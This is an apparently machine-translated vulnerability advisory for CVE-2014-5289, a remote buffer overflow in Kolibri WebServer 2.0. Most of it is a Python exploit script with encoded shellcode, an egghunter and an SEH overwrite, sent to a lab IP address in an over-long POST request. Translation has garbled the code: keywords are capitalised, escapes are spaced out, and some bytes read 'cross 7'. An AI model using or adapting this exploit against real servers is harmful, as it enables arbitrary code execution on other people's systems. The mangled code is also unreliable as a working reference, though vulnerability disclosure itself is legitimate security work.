Kolibri buffer overflow vulnerability in CVE-2014-5289)

Kolibri buffer overflow vulnerability in CVE-2014-5289)

Release date:

Updated on:

 

Affected Systems:

SENKAS Kolibri WebServer 2.0

SENKAS Kolibri WebServer

Description:

Bugtraq id: 69263

CVE (CAN) ID: CVE-2014-5289

 

Kolibri is a simple HTTP server that supports static Web content and the License book is GPL V3.

 

Kolibri 2.0 and other versions have the remote buffer overflow vulnerability when handling ultra-long POST requests. Attackers can exploit this vulnerability to execute arbitrary code in the context of the affected application.

 

<* Source: tekwizz123

*>

 

Test method:

Alert

 

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

 

----------------------------------

#! /Bin/python

Import socket

 

# [*] X86/alpha_mixed succeeded with size 636 (iteration = 1)

Buf = "\ x45 \ x44 \ x44 \ x43 \ x45 \ x44 \ x44 \ x43" # TAG

Buf + = "\ x89 \ xe5 \ xda \ xdd \ xd9 \ x75 \ xf4 \ x5f \ x57 \ x59 \ x49 \ x49 \ x49"

Buf + = "\ x49 \ x49 \ x49 \ x49 \ x49 \ x49 \ x49 \ x43 \ x43 \ x43 \ x43 \ x43 \ x43 \ x43"

Buf + = "\ x37 \ x51 \ x5a \ x6a \ x41 \ x58 \ x50 \ x30 \ x41 \ x30 \ x41 \ x6b \ x41"

Buf + = "\ x41 \ x51 \ x32 \ x41 \ x42 \ x32 \ x42 \ x42 \ x30 \ x42 \ x42 \ x41 \ x42"

Buf + = "\ x58 \ x50 \ x38 \ x41 \ x42 \ x75 \ x4a \ x49 \ x49 \ x6c \ x69 \ x78 \ x6e"

Buf + = "\ x66 \ x53 \ x30 \ x35 \ x50 \ x73 \ x30 \ x75 \ x30 \ x6d \ x59 \ x4a \ x45"

Buf + = "\ x35 \ x61 \ x4e \ x32 \ x33 \ x54 \ x6c \ x4b \ x31 \ x42 \ x66 \ x50 \ x6c"

Buf + = "\ x4b \ x62 \ x72 \ x34 \ x4c \ x6c \ x4b \ x73 \ x62 \ x52 \ x34 \ x6e \ x6b"

Buf + = "\ x72 \ x52 \ x61 \ x38 \ x46 \ x6f \ x6c \ x77 \ x51 \ x5a \ x66 \ x46 \ x45"

Buf + = "\ x61 \ x59 \ x6f \ x54 \ x71 \ x79 \ x50 \ x4c \ x6c \ x75 \ x6c \ x50 \ x61"

Buf + = "\ x51 \ x6c \ x65 \ x52 \ x34 \ x6c \ x47 \ x50 \ x6f \ x31 \ x4a \ x6f \ x64"

Buf + = "\ x4d \ x57 \ x71 \ x6b \ x77 \ x4a \ x42 \ x7a \ x50 \ x36 \ x32 \ x71 \ x47"

Buf + = "\ x6e \ x6b \ x56 \ x32 \ x36 \ x4c \ x4b \ x53 \ x72 \ x55 \ x6c \ x4c"

Buf + = "\ x4b \ x50 \ x4c \ x42 \ x30 \ x33 \ x48 \ x4b \ x53 \ x32 \ x6a \ x56 \ x61"

Buf + = "\ x4a \ x71 \ x50 \ x51 \ x4c \ x4b \ x43 \ x69 \ x67 \ x50 \ x47 \ x71 \ x79"

Buf + = "\ x43 \ x6c \ x4b \ x31 \ x59 \ x62 \ x38 \ x68 \ x63 \ x77 \ x4c \ x51 \ x59"

Buf + = "\ x6e \ x6b \ x75 \ x64 \ x6c \ x4b \ x36 \ x61 \ x6b \ x66 \ x44 \ x71 \ x49"

Buf + = "\ x6f \ x55 \ x61 \ x69 \ x50 \ x4e \ x4c \ x4b \ x71 \ x38 \ x4f \ x46 \ x6d"

Buf + = "\ x37 \ x71 \ x78 \ x47 \ x65 \ x68 \ x39 \ cross 7 \ x34 \ x35 \ x7a \ x54 \ x47"

Buf + = "\ x73 \ x73 \ x4d \ x79 \ x68 \ x37 \ x4b \ x33 \ x4d \ x64 \ x64 \ cross 7 \ x75"

Buf + = "\ x6a \ x42 \ x56 \ x38 \ x6c \ x4b \ x72 \ x78 \ x75 \ x74 \ x53 \ x31 \ x4e"

Buf + = "\ x33 \ x50 \ x66 \ x4c \ x4b \ x54 \ x4c \ x4b \ x4b \ x6c \ x4b \ x36 \ x38"

Buf + = "\ x65 \ x4c \ x33 \ x31 \ x4e \ x33 \ x4e \ x6b \ x67 \ x74 \ x4c \ x4b \ x76"

Buf + = "\ x61 \ x48 \ x50 \ x6f \ x79 \ x71 \ x54 \ x51 \ x34 \ x34 \ x64 \ x43 \ x6b"

Buf + = "\ x71 \ x4b \ x73 \ x51 \ x53 \ x69 \ x32 \ x7a \ x42 \ x71 \ x79 \ x6f \ x4d"

Buf + = "\ x30 \ x42 \ x78 \ x43 \ x6f \ x51 \ x4a \ x6c \ x4b \ x37 \ x62 \ x58 \ x6b"

Buf + = "\ x6d \ x59 \ x31 \ x4d \ x45 \ x38 \ x33 \ x74 \ x72 \ x63 \ x30 \ x67"

Buf + = "\ cross 7 \ x75 \ x38 \ cross 7 \ x77 \ x33 \ x43 \ x46 \ x52 \ x31 \ x4f \ x42 \ x74"

Buf + = "\ x68 \ x62 \ x6c \ x63 \ x47 \ x65 \ x76 \ x56 \ x67 \ x6b \ x4f \ x4b"

Buf + = "\ x65 \ x6c \ x78 \ x6e \ cross \ x76 \ x61 \ x45 \ x50 \ x37 \ cross 7 \ x45 \ x79"

Buf + = "\ x49 \ x54 \ x76 \ x34 \ cross \ x50 \ x65 \ x38 \ x76 \ x49 \ x4b \ x30 \ x52"

Buf + = "\ x4b \ x45 \ x50 \ x49 \ x6f \ x4b \ x65 \ x46 \ x30 \ x50 \ x50 \ cross city \ x50"

Buf + = "\ x76 \ x30 \ x37 \ x30 \ x42 \ x47 \ x30 \ x42 \ x71 \ x78 \ x48"

Buf + = "\ x6a \ x76 \ x6f \ x4b \ x6f \ x49 \ cross city \ x39 \ x6f \ x59 \ x45 \ x5a \ x37"

Buf + = "\ x50 \ x6a \ x63 \ x35 \ x71 \ x78 \ x4f \ x30 \ x6f \ x58 \ x65 \ x6e \ x4f"

Buf + = "\ x71 \ x75 \ x38 \ x65 \ x52 \ x43 \ x30 \ x36 \ x71 \ x53 \ x6c \ x6c \ x49"

Buf + = "\ x4d \ x36 \ x73 \ x5a \ x44 \ x50 \ x43 \ x66 \ x43 \ x67 \ x32 \ x48 \ x6a"

Buf + = "\ x39 \ x49 \ x35 \ x62 \ x54 \ x63 \ x51 \ x59 \ x6f \ x78 \ x55 \ x4f \ x75"

Buf + = "\ x59 \ x50 \ x42 \ x54 \ x36 \ x6c \ x6b \ x4f \ x32 \ x6e \ x65 \ x58 \ x72"

Buf + = "\ x55 \ x7a \ x4c \ x30 \ x68 \ x38 \ x58 \ x35 \ x6f \ x52 \ x33 \ x66"

Buf + = "\ x6b \ x4f \ x58 \ x55 \ cross \ x6a \ x35 \ x50 \ x72 \ x4a \ x76 \ x64 \ x63"

Buf + = "\ x66 \ x50 \ x57 \ x53 \ x58 \ x66 \ x62 \ x78 \ x59 \ x68 \ x48 \ x43 \ x6f"

Buf + = "\ x79 \ x6f \ x7a \ x75 \ x6c \ x4b \ x65 \ x66 \ x72 \ x4a \ x73 \ cross 7 \ x65"

Buf + = "\ x38 \ x65 \ x50 \ x34 \ x50 \ x67 \ cross 7 \ x37 \ cross 7 \ x73 \ x66 \ x32 \ x4a"

Buf + = "\ x43 \ x30 \ x55 \ x38 \ x43 \ x68 \ x4d \ x74 \ x31 \ x43 \ x4b \ x55 \ x39"

Buf + = "\ x6f \ x79 \ x45 \ x6e \ x73 \ x42 \ x73 \ x31 \ x7a \ x75 \ x50 \ x32 \ x76"

Buf + = "\ x76 \ x33 \ x43 \ x67 \ x51 \ x78 \ x56 \ x62 \ x49 \ x49 \ x39 \ x58 \ x61"

Buf + = "\ x4f \ x69 \ x6f \ x48 \ x55 \ x57 \ x71 \ x59 \ x53 \ x55 \ x79 \ x7a \ x66"

Buf + = "\ x4f \ x75 \ x79 \ x66 \ cross \ x75 \ x68 \ x6c \ x4a \ x63 \ x41 \ x41"

 

Egghunter = "\ x66 \ x81 \ xca \ xff \ x0f \ x42 \ x52 \ x6a \ x02 \ x58 \ xcd \ x2e \ x3c \ x05 \ x5a \ x74 \ xef \ xb

8 \ x45 \ x44 \ x44 \ x43 \ x8b \ xfa \ xaf \ x75 \ xea \ xaf \ x75 \ xe7 \ xff \ xe7"

 

Overflow = "A" * 12

Overflow + = "A" * (790-len (overflow)-len (egghunter ))

Overflow + = egghunter

Overflow + = "\ xEB \ xD9" # This offset seems to work against Windows 7 Professional, fully updated as of August 5th, 2014

Overflow + = "A" * 2

Overflow + = "\ x50 \ x45 \ x62" # SEH overwrite 00624550 aka pop ret from the binary itself.

 

# A lot of this is the same as exploit 34059 from exploit-db

 

Buffer = "POST/" + overflow + "HTTP/1.1 \ r \ n"

Buffer + = "User-Agent: Wget/1.13.4 \ r \ n"

Buffer + = "Host:" + buf + "\ r \ n"

Buffer + = "Accept: */* \ r \ n"

Buffer + = "Connection: Keep-Alive \ r \ n"

Buffer + = "Content-Type: application/x-www-form-urlencoded \ r \ n"

Buffer + = "Content-Length: 4"

Buffer + = "\ r \ n"

Buffer + = "licenseID = string & content = string & paramsXML = string"

 

Handle = socket. socket (socket. AF_INET, socket. SOCK_STREAM)

Handle. connect ("192.168.62.130", 8080 ))

Handle. send (buffer)

Handle. close ()

 

Suggestion:

Vendor patch:

 

SENKAS

------

Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

 

Http://www.senkas.com/kolibri/